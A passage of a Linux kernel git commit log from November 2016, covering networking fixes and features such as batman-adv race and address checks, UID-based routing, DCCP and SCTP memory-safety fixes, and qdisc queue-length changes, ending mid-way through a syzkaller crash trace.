It does not happen often, but may potentially happen when frequently
shutting down and reinitializing an interface. With some carefully
placed msleep()s/mdelay()s it can be reproduced easily.

The issue is, that on interface removal, any still running worker thread
of a forwarding packet will race with the interface purging routine to
free a forwarding packet. Temporarily giving up a spin-lock to be able
to sleep in the purging routine is not safe.

Furthermore, there is a potential general protection fault not just for
the purging side shown above, but also on the worker side: Temporarily
removing a forw_packet from the according forw_{bcast,bat}_list will make
it impossible for the purging routine to catch and cancel it.

 # How this patch tries to fix it:

With this patch we split the queue purging into three steps: Step 1),
removing forward packets from the queue of an interface and by that
claim it as our responsibility to free.

Step 2), we are either lucky to cancel a pending worker before it starts
to run. Or if it is already running, we wait and let it do its thing,
except two things:

Through the claiming in step 1) we prevent workers from a) re-arming
themselves. And b) prevent workers from freeing packets which we still
hold in the interface purging routine.

Finally, step 3, we are sure that no forwarding packets are pending or
even running anymore on the interface to remove. We can then safely free
the claimed forwarding packets.

Signed-off-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:39 +01:00
Sven Eckelmann
2c0c06ff44 batman-adv: Add module alias for batadv netlink family
The batman-adv module has to be loaded to fulfill genl request by the
userspace. When it is not loaded then requests will fail. It is therefore
useful to get the module automatically loaded when such a request is made.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:39 +01:00
Sven Eckelmann
ee3b5e9fe8 batman-adv: Update wifi flags on upper link change
Things like VLANs don't have their link set when they are created. Thus
the wifi flags have to be evaluated later to fix their contents for the
link interface.

Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:38 +01:00
Marek Lindner
1942de1bba batman-adv: retrieve B.A.T.M.A.N. V WiFi neighbor stats from real interface
Signed-off-by: Marek Lindner <mareklindner@neomailbox.ch>
[sven.eckelmann@open-mesh.com: re-add batadv_get_real_netdev to take rtnl
 semaphore for batadv_get_real_netdevice]
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:38 +01:00
Marek Lindner
5ed4a460a1 batman-adv: additional checks for virtual interfaces on top of WiFi
In a few situations batman-adv tries to determine whether a given interface
is a WiFi interface to enable specific WiFi optimizations. If the interface
batman-adv has been configured with is a virtual interface (e.g. VLAN) it
would not be properly detected as WiFi interface and thus not benefit from
the special WiFi treatment.
This patch changes that by peeking under the hood whenever a virtual
interface is in play.

Signed-off-by: Marek Lindner <mareklindner@neomailbox.ch>
[sven.eckelmann@open-mesh.com: integrate in wifi_flags caching, retrieve
 namespace of link interface]
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:38 +01:00
Sven Eckelmann
10b1bbb46c batman-adv: Cache the type of wifi device for each hardif
batman-adv is requiring the type of wifi device in different contexts. Some
of them can take the rtnl semaphore and some of them already have the
semaphore taken. But even others don't allow that the semaphore will be
taken.

The data has to be retrieved when the hardif is added to batman-adv because
some of the wifi information for an hardif will only be available with rtnl
lock. It can then be cached in the batadv_hard_iface and the functions
is_wifi_netdev and is_cfg80211_netdev can just compare the correct bits
without imposing extra locking requirements.

Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:37 +01:00
Marek Lindner
f44a3ae9a2 batman-adv: refactor wifi interface detection
The ELP protocol requires cfg80211 to auto-detect the WiFi througput
to a given neighbor. Use batadv_is_cfg80211_netdev() to determine
whether or not an interface is eligible.

Signed-off-by: Marek Lindner <mareklindner@neomailbox.ch>
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:37 +01:00
Sven Eckelmann
93bbaab455 batman-adv: Reject unicast packet with zero/mcast dst address
An unicast batman-adv packet cannot be transmitted to a multicast or zero
mac address. So reject incoming packets which still have these classes of
addresses as destination mac address in the outer ethernet header.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:36 +01:00
Sven Eckelmann
88ffc7d0e2 batman-adv: Return non-const ptr in batadv_getlink_net
The returned net_namespace of batadv_getlink_net may be used with functions
that potentially modify the struct. Thus it must return the pointer as
non-const like rtnl_link_ops::get_link_net does.

Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:36 +01:00
Sven Eckelmann
92eef520d7 batman-adv: Disallow zero and mcast src address for mgmt frames
The routing check for management frames is validating the source mac
address in the outer ethernet header. It rejects every source mac address
which is a broadcast address. But it also has to reject the zero-mac
address and multicast mac addresses.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:35 +01:00
Sven Eckelmann
9f75c8e1c8 batman-adv: Disallow mcast src address for data frames
The routing checks are validating the source mac address of the outer
ethernet header. They reject every source mac address which is a broadcast
address. But they also have to reject any multicast mac addresses.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
[sw@simonwunderlich.de: fix commit message typo]
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:35 +01:00
Sven Eckelmann
7d72d174c7 batman-adv: Remove dev_queue_xmit return code exception
No caller of batadv_send_skb_to_orig is expecting the results to be -1
(-EPERM) anymore when the skbuff was not consumed. They will instead expect
that the skbuff is always consumed. Having such return code filter is
therefore not needed anymore.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:34 +01:00
Sven Eckelmann
b91a2543b4 batman-adv: Consume skb in receive handlers
Receiving functions in Linux consume the supplied skbuff. Doing the same in
the batadv_rx_handler functions makes the behavior more similar to the rest
of the Linux network code.

Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-08 19:02:34 +01:00
Alexander Duyck
fd0285a39b fib_trie: Correct /proc/net/route off by one error
The display of /proc/net/route has had a couple issues due to the fact that
when I originally rewrote most of fib_trie I made it so that the iterator
was tracking the next value to use instead of the current.

In addition it had an off by 1 error where I was tracking the first piece
of data as position 0, even though in reality that belonged to the
SEQ_START_TOKEN.

This patch updates the code so the iterator tracks the last reported
position and key instead of the next expected position and key.  In
addition it shifts things so that all of the leaves start at 1 instead of
trying to report leaves starting with offset 0 as being valid.  With these
two issues addressed this should resolve any off by one errors that were
present in the display of /proc/net/route.

Fixes: 25b97c016b ("ipv4: off-by-one in continuation handling in /proc/net/route")
Cc: Andy Whitcroft <apw@canonical.com>
Reported-by: Jason Baron <jbaron@akamai.com>
Tested-by: Jason Baron <jbaron@akamai.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 20:40:27 -05:00
David Ahern
5d41ce29e3 net: icmp6_send should use dst dev to determine L3 domain
icmp6_send is called in response to some event. The skb may not have
the device set (skb->dev is NULL), but it is expected to have a dst set.
Update icmp6_send to use the dst on the skb to determine L3 domain.

Fixes: ca254490c8 ("net: Add VRF support to IPv6 stack")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 20:30:19 -05:00
Soheil Hassas Yeganeh
f5f99309fa sock: do not set sk_err in sock_dequeue_err_skb
Do not set sk_err when dequeuing errors from the error queue.
Doing so results in:
a) Bugs: By overwriting existing sk_err values, it possibly
   hides legitimate errors. It is also incorrect when local
   errors are queued with ip_local_error. That happens in the
   context of a system call, which already returns the error
   code.
b) Inconsistent behavior: When there are pending errors on
   the error queue, sk_err is sometimes 0 (e.g., for
   the first timestamp on the error queue) and sometimes
   set to an error code (after dequeuing the first
   timestamp).
c) Suboptimality: Setting sk_err to ENOMSG on simple
   TX timestamps can abort parallel reads and writes.

Removing this line doesn't break userspace. This is because
userspace code cannot rely on sk_err for detecting whether
there is something on the error queue. Except for ICMP messages
received for UDP and RAW, sk_err is not set at enqueue time,
and as a result sk_err can be 0 while there are plenty of
errors on the error queue.

For ICMP packets in UDP and RAW, sk_err is set when they are
enqueued on the error queue, but that does not result in aborting
reads and writes. For such cases, sk_err is only readable via
getsockopt(SO_ERROR) which will reset the value of sk_err on
its own. More importantly, prior to this patch,
recvmsg(MSG_ERRQUEUE) has a race on setting sk_err (i.e.,
sk_err is set by sock_dequeue_err_skb without atomic ops or
locks) which can store 0 in sk_err even when we have ICMP
messages pending. Removing this line from sock_dequeue_err_skb
eliminates that race.

Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 20:29:10 -05:00
Jesper Dangaard Brouer
84c46dd865 qdisc: catch misconfig of attaching qdisc to tx_queue_len zero device
It is a clear misconfiguration to attach a qdisc to a device with
tx_queue_len zero, because some qdisc's (namely, pfifo, bfifo, gred,
htb, plug and sfb) inherit/copy this value as their queue length.

Why should the kernel catch such a misconfiguration?  Because prior to
introducing the IFF_NO_QUEUE device flag, userspace found a loophole
in the qdisc config system that allowed them to achieve the equivalent
of IFF_NO_QUEUE, which is to remove the qdisc code path entirely from
a device.  The loophole on older kernels is setting tx_queue_len=0,
*prior* to device qdisc init (the config time is significant, simply
setting tx_queue_len=0 doesn't trigger the loophole).

This loophole is currently used by Docker[1] to get better performance
and scalability out of the veth device.  The Docker developers were
warned[1] that they needed to adjust the tx_queue_len if ever
attaching a qdisc.  The OpenShift project didn't remember this warning
and attached a qdisc, this were caught and fixed in[2].

[1] https://github.com/docker/libcontainer/pull/193
[2] https://github.com/openshift/origin/pull/11126

Instead of fixing every userspace program that used this loophole, and
forgot to reset the tx_queue_len, prior to attaching a qdisc.  Let's
catch the misconfiguration on the kernel side.

Signed-off-by: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 20:15:55 -05:00
Jesper Dangaard Brouer
1159708432 net/qdisc: IFF_NO_QUEUE drivers should use consistent TX queue len
The flag IFF_NO_QUEUE marks virtual device drivers that doesn't need a
default qdisc attached, given they will be backed by physical device,
that already have a qdisc attached for pushback.

It is still supported to attach a qdisc to a IFF_NO_QUEUE device, as
this can be useful for difference policy reasons (e.g. bandwidth
limiting containers).  For this to work, the tx_queue_len need to have
a sane value, because some qdiscs inherit/copy the tx_queue_len
(namely, pfifo, bfifo, gred, htb, plug and sfb).

Commit a813104d92 ("IFF_NO_QUEUE: Fix for drivers not calling
ether_setup()") caught situations where some drivers didn't initialize
tx_queue_len.  The problem with the commit was choosing 1 as the
fallback value.

A qdisc queue length of 1 causes more harm than good, because it
creates hard to debug situations for userspace. It gives userspace a
false sense of a working config after attaching a qdisc.  As low
volume traffic (that doesn't activate the qdisc policy) works,
like ping, while traffic that e.g. needs shaping cannot reach the
configured policy levels, given the queue length is too small.

This patch change the value to DEFAULT_TX_QUEUE_LEN, given other
IFF_NO_QUEUE devices (that call ether_setup()) also use this value.

Fixes: a813104d92 ("IFF_NO_QUEUE: Fix for drivers not calling ether_setup()")
Signed-off-by: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 20:15:55 -05:00
Jesper Dangaard Brouer
d0a81f67cd net: make default TX queue length a defined constant
The default TX queue length of Ethernet devices have been a magic
constant of 1000, ever since the initial git import.

Looking back in historical trees[1][2] the value used to be 100,
with the same comment "Ethernet wants good queues". The commit[3]
that changed this from 100 to 1000 didn't describe why, but from
conversations with Robert Olsson it seems that it was changed
when Ethernet devices went from 100Mbit/s to 1Gbit/s, because the
link speed increased x10 the queue size were also adjusted.  This
value later caused much heartache for the bufferbloat community.

This patch merely moves the value into a defined constant.

[1] https://git.kernel.org/cgit/linux/kernel/git/davem/netdev-vger-cvs.git/
[2] https://git.kernel.org/cgit/linux/kernel/git/tglx/history.git/
[3] https://git.kernel.org/tglx/history/c/98921832c232

Signed-off-by: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 20:15:55 -05:00
Anna Schumaker
bb29dd8433 SUNRPC: Fix suspicious RCU usage
We need to hold the rcu_read_lock() when calling rcu_dereference(),
otherwise we can't guarantee that the object being dereferenced still
exists.

Fixes: 39e5d2df ("SUNRPC search xprt switch for sockaddr")
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
2016-11-07 14:35:59 -05:00
Paolo Abeni
7c13f97ffd udp: do fwd memory scheduling on dequeue
A new argument is added to __skb_recv_datagram to provide
an explicit skb destructor, invoked under the receive queue
lock.
The UDP protocol uses such argument to perform memory
reclaiming on dequeue, so that the UDP protocol does not
set anymore skb->desctructor.
Instead explicit memory reclaiming is performed at close() time and
when skbs are removed from the receive queue.
The in kernel UDP protocol users now need to call a
skb_recv_udp() variant instead of skb_recv_datagram() to
properly perform memory accounting on dequeue.

Overall, this allows acquiring only once the receive queue
lock on dequeue.

Tested using pktgen with random src port, 64 bytes packet,
wire-speed on a 10G link as sender and udp_sink as the receiver,
using an l4 tuple rxhash to stress the contention, and one or more
udp_sink instances with reuseport.

nr sinks	vanilla		patched
1		440		560
3		2150		2300
6		3650		3800
9		4450		4600
12		6250		6450

v1 -> v2:
 - do rmem and allocated memory scheduling under the receive lock
 - do bulk scheduling in first_packet_length() and in udp_destruct_sock()
 - avoid the typdef for the dequeue callback

Suggested-by: Eric Dumazet <edumazet@google.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 13:24:41 -05:00
Paolo Abeni
ad959036a7 net/sock: add an explicit sk argument for ip_cmsg_recv_offset()
So that we can use it even after orphaining the skbuff.

Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 13:24:41 -05:00
Marcelo Ricardo Leitner
7233bc84a3 sctp: assign assoc_id earlier in __sctp_connect
sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread release it. But Andrey
Konovalov and Dmitry Vyukov reported an use-after-free in such
situation.

Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.

Fix is, instead of doing the read after waiting for the connect, do it
before so, and avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.

This issue doesn't exist in sctp_sendmsg() path.

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 13:18:37 -05:00
David Ahern
cd2c0f4540 net: Update raw socket bind to consider l3 domain
Binding a raw socket to a local address fails if the socket is bound
to an L3 domain:

    $ vrf-test  -s -l 10.100.1.2 -R -I red
    error binding socket: 99: Cannot assign requested address

Update raw_bind to look consider if sk_bound_dev_if is bound to an L3
domain and use inet_addr_type_table to lookup the address.

Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-07 13:14:34 -05:00
Linus Torvalds
fb415f222c Fixes for some recent regressions including fallout from the vmalloc'd
stack change (after which we can no longer encrypt stuff on the stack).
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABAgAGBQJYHNwpAAoJECebzXlCjuG++DMP/3mUUAF09DfFR/EHl7knDT1f
 kZ53UVHYzr02w0wXfwxVLlp2H7TdSAufgsSvPT6qksA3eY7gL6nJ9zHkl+Nv5yCx
 y6vsFWjO1QEUWFOZWCKcmT2dAI3Ddt9IhK13pfZEKN1XKvK2zWB16HEVzSg6fR2K
 NwHlpMnQUI4HWThURzwTZb1M5YhxRCAnyiv8BTAAPjbEfzPzdL7j3jxwqtH8bOWp
 qIcDDvjC744b9zy0YuAEY/NyGBhYZPdM6gWsBBes1TRzBWUL9qsUYTWDJTmg/F1l
 Or0Jz7CUEN9uOHLGnkATPDc+eBg9YFV+bSsSnJu1/W4Er7dX1Af/lol79zEp/Zw1
 Snd9FelSPj3vxmYAFTCLnHRTRgsyiDhbbb7gVrzH9bxnCrRNR6p2kY018s1Cl9Td
 uWQoNNFQwwnYxWYEeZdO5PgX+pcgoCzhHACNk5oA93YaBE0GuLHHugwwIrYE8TM1
 1iY20sLC5lJcnPqxdgnoprZnnHMuL6rx5KRbvBeflNZ4huK2PIcPJyeB83XH6s12
 G67PjJ0rfWzSBF14O/ZtQA6he+kXvnH3pKqpNnaMiBxZZ2J8E1eQvrKTLLIwmtlP
 18KKJpZIzh7jTTZ/99nAMAt/BGw97P9TToLdnI8dCxYygHEaywpEYtcsE8IWFAvA
 3XkS5QdlJhhAaAUUYBXy
 =oPbZ
 -----END PGP SIGNATURE-----

Merge tag 'nfsd-4.9-1' of git://linux-nfs.org/~bfields/linux

Pull nfsd bugfixes from Bruce Fields:
 "Fixes for some recent regressions including fallout from the vmalloc'd
  stack change (after which we can no longer encrypt stuff on the
  stack)"

* tag 'nfsd-4.9-1' of git://linux-nfs.org/~bfields/linux:
  nfsd: Fix general protection fault in release_lock_stateid()
  svcrdma: backchannel cannot share a page for send and rcv buffers
  sunrpc: fix some missing rq_rbuffer assignments
  sunrpc: don't pass on-stack memory to sg_set_buf
  nfsd: move blocked lock handling under a dedicated spinlock
2016-11-04 20:12:10 -07:00
Lorenzo Colitti
e2d118a1cb net: inet: Support UID-based routing in IP protocols.
- Use the UID in routing lookups made by protocol connect() and
  sendmsg() functions.
- Make sure that routing lookups triggered by incoming packets
  (e.g., Path MTU discovery) take the UID of the socket into
  account.
- For packets not associated with a userspace socket, (e.g., ping
  replies) use UID 0 inside the user namespace corresponding to
  the network namespace the socket belongs to. This allows
  all namespaces to apply routing and iptables rules to
  kernel-originated traffic in that namespaces by matching UID 0.
  This is better than using the UID of the kernel socket that is
  sending the traffic, because the UID of kernel sockets created
  at namespace creation time (e.g., the per-processor ICMP and
  TCP sockets) is the UID of the user that created the socket,
  which might not be mapped in the namespace.

Tested: compiles allnoconfig, allyesconfig, allmodconfig
Tested: https://android-review.googlesource.com/253302
Signed-off-by: Lorenzo Colitti <lorenzo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-04 14:45:23 -04:00
Lorenzo Colitti
622ec2c9d5 net: core: add UID to flows, rules, and routes
- Define a new FIB rule attributes, FRA_UID_RANGE, to describe a
  range of UIDs.
- Define a RTA_UID attribute for per-UID route lookups and dumps.
- Support passing these attributes to and from userspace via
  rtnetlink. The value INVALID_UID indicates no UID was
  specified.
- Add a UID field to the flow structures.

Signed-off-by: Lorenzo Colitti <lorenzo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-04 14:45:23 -04:00
Lorenzo Colitti
86741ec254 net: core: Add a UID field to struct sock.
Protocol sockets (struct sock) don't have UIDs, but most of the
time, they map 1:1 to userspace sockets (struct socket) which do.

Various operations such as the iptables xt_owner match need
access to the "UID of a socket", and do so by following the
backpointer to the struct socket. This involves taking
sk_callback_lock and doesn't work when there is no socket
because userspace has already called close().

Simplify this by adding a sk_uid field to struct sock whose value
matches the UID of the corresponding struct socket. The semantics
are as follows:

1. Whenever sk_socket is non-null: sk_uid is the same as the UID
   in sk_socket, i.e., matches the return value of sock_i_uid.
   Specifically, the UID is set when userspace calls socket(),
   fchown(), or accept().
2. When sk_socket is NULL, sk_uid is defined as follows:
   - For a socket that no longer has a sk_socket because
     userspace has called close(): the previous UID.
   - For a cloned socket (e.g., an incoming connection that is
     established but on which userspace has not yet called
     accept): the UID of the socket it was cloned from.
   - For a socket that has never had an sk_socket: UID 0 inside
     the user namespace corresponding to the network namespace
     the socket belongs to.

Kernel sockets created by sock_create_kern are a special case
of #1 and sk_uid is the user that created them. For kernel
sockets created at network namespace creation time, such as the
per-processor ICMP and TCP sockets, this is the user that created
the network namespace.

Signed-off-by: Lorenzo Colitti <lorenzo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-04 14:45:22 -04:00
Sven Eckelmann
e13258f38e batman-adv: Detect missing primaryif during tp_send as error
The throughput meter detects different situations as problems for the
current test. It stops the test after these and reports it to userspace.
This also has to be done when the primary interface disappeared during the
test.

Fixes: 33a3bb4a33 ("batman-adv: throughput meter implementation")
Reported-by: Joe Perches <joe@perches.com>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-04 12:27:39 +01:00
Sven Eckelmann
27915aa610 batman-adv: Revert "fix splat on disabling an interface"
The commit 9799c50372 ("batman-adv: fix splat on disabling an interface")
fixed a warning but at the same time broke the rtnl function add_slave for
devices which were temporarily removed.

batadv_softif_slave_add requires soft_iface of and hard_iface to be NULL
before it is allowed to be enslaved. But this resetting of soft_iface to
NULL in batadv_hardif_disable_interface was removed with the aforementioned
commit.

Reported-by: Julian Labus <julian@freifunk-rtk.de>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
2016-11-04 12:27:34 +01:00
WANG Cong
00ffc1ba02 genetlink: fix a memory leak on error path
In __genl_register_family(), when genl_validate_assign_mc_groups()
fails, we forget to free the memory we possibly allocate for
family->attrbuf.

Note, some callers call genl_unregister_family() to clean up
on error path, it doesn't work because the family is inserted
to the global list in the nearly last step.

Cc: Jakub Kicinski <kubakici@wp.pl>
Cc: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:52:29 -04:00
Eric Dumazet
990ff4d844 ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped
While fuzzing kernel with syzkaller, Andrey reported a nasty crash
in inet6_bind() caused by DCCP lacking a required method.

Fixes: ab1e0a13d7 ("[SOCK] proto: Add hashinfo member to struct proto")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:50:27 -04:00
Simon Horman
5976c5f45c net/sched: cls_flower: Support matching on SCTP ports
Support matching on SCTP ports in the same way that matching
on TCP and UDP ports is already supported.

Example usage:

tc qdisc add dev eth0 ingress

tc filter add dev eth0 protocol ip parent ffff: \
        flower indev eth0 ip_proto sctp dst_port 80 \
        action drop

Signed-off-by: Simon Horman <simon.horman@netronome.com>
Acked-by: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:26:39 -04:00
Eric Dumazet
1aa9d1a0e7 ipv6: dccp: fix out of bound access in dccp_v6_err()
dccp_v6_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:16:51 -04:00
Eric Dumazet
93636d1f1f netlink: netlink_diag_dump() runs without locks
A recent commit removed locking from netlink_diag_dump() but forgot
one error case.

=====================================
[ BUG: bad unlock balance detected! ]
4.9.0-rc3+ #336 Not tainted
-------------------------------------
syz-executor/4018 is trying to release lock ([   36.220068] nl_table_lock
) at:
[<ffffffff82dc8683>] netlink_diag_dump+0x1a3/0x250 net/netlink/diag.c:182
but there are no more locks to release!

other info that might help us debug this:
3 locks held by syz-executor/4018:
 #0: [   36.220068]  (
sock_diag_mutex[   36.220068] ){+.+.+.}
, at: [   36.220068] [<ffffffff82c3873b>] sock_diag_rcv+0x1b/0x40
 #1: [   36.220068]  (
sock_diag_table_mutex[   36.220068] ){+.+.+.}
, at: [   36.220068] [<ffffffff82c38e00>] sock_diag_rcv_msg+0x140/0x3a0
 #2: [   36.220068]  (
nlk->cb_mutex[   36.220068] ){+.+.+.}
, at: [   36.220068] [<ffffffff82db6600>] netlink_dump+0x50/0xac0

stack backtrace:
CPU: 1 PID: 4018 Comm: syz-executor Not tainted 4.9.0-rc3+ #336
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
 ffff8800645df688 ffffffff81b46934 ffffffff84eb3e78 ffff88006ad85800
 ffffffff82dc8683 ffffffff84eb3e78 ffff8800645df6b8 ffffffff812043ca
 dffffc0000000000 ffff88006ad85ff8 ffff88006ad85fd0 00000000ffffffff
Call Trace:
 [<     inline     >] __dump_stack lib/dump_stack.c:15
 [<ffffffff81b46934>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
 [<ffffffff812043ca>] print_unlock_imbalance_bug+0x17a/0x1a0
kernel/locking/lockdep.c:3388
 [<     inline     >] __lock_release kernel/locking/lockdep.c:3512
 [<ffffffff8120cfd8>] lock_release+0x8e8/0xc60 kernel/locking/lockdep.c:3765
 [<     inline     >] __raw_read_unlock ./include/linux/rwlock_api_smp.h:225
 [<ffffffff83fc001a>] _raw_read_unlock+0x1a/0x30 kernel/locking/spinlock.c:255
 [<ffffffff82dc8683>] netlink_diag_dump+0x1a3/0x250 net/netlink/diag.c:182
 [<ffffffff82db6947>] netlink_dump+0x397/0xac0 net/netlink/af_netlink.c:2110

Fixes: ad20207432 ("netlink: Use rhashtable walk interface in diag dump")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:16:51 -04:00
Eric Dumazet
6706a97fec dccp: fix out of bound access in dccp_v4_err()
dccp_v4_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.

This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-11-03 16:16:51 -04:00
Eric Dumazet
346da62cc1 dccp: do not send reset to already closed sockets
Andrey reported following warning while fuzzing with syzkaller

WARNING: CPU: 1 PID: 21072 at net/dccp/proto.c:83 dccp_set_state+0x229/0x290
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 21072 Comm: syz-executor Not tainted 4.9.0-rc1+ #293
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
 ffff88003d4c7738 ffffffff81b474f4 0000000000000003 dffffc0000000000
 ffffffff844f8b00 ffff88003d4c7804 ffff88003d4c7800 ffffffff8140c06a
 0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
 [<     inline     >] __dump_stack lib/dump_stack.c:15
 [<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
 [<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
 [<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
 [<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
 [<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
 [<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
 [<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
 [<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
 [<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
 [<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
 [<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
 [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
 [<     inline     >] exit_task_work include/linux/task_work.h:21
 [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
 [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
 [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
 [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
